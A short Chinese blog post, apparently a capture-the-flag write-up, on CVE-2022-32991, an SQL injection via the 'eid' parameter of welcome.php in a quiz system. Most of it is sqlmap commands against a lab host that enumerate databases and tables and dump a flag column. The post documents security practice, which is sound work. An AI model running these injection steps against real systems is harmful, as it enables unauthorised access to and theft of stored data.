CVE-2022-32991

发表于 2024/02/20 更新于 2024/03/02

作者 Leo 1 分钟阅读

描述

该CMS的welcome.php中存在SQL注入攻击。

位置

/welcome.php

漏洞分析

注册登录

在welcome.php，发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞。S 存在SQL注入漏洞，可以通过eid参数进行注入。

查询数据库

python sqlmap.py -u "http://eci-2ze4tsdmyu2zp7bj7frb.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --batch --dbs

指定数据库的表

python sqlmap.py -u "http://eci-2ze4tsdmyu2zp7bj7frb.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --batch -D "ctf" --tables

指定表的列 --batch -D "ctf" -T "flag" --columns

指定列的数据 --batch -D "ctf" -T "flag" -C "flag" --dump

Blogging, CVE

CVE

本文由作者按照 CC BY 4.0 进行授权

描述

位置

漏洞分析

热门标签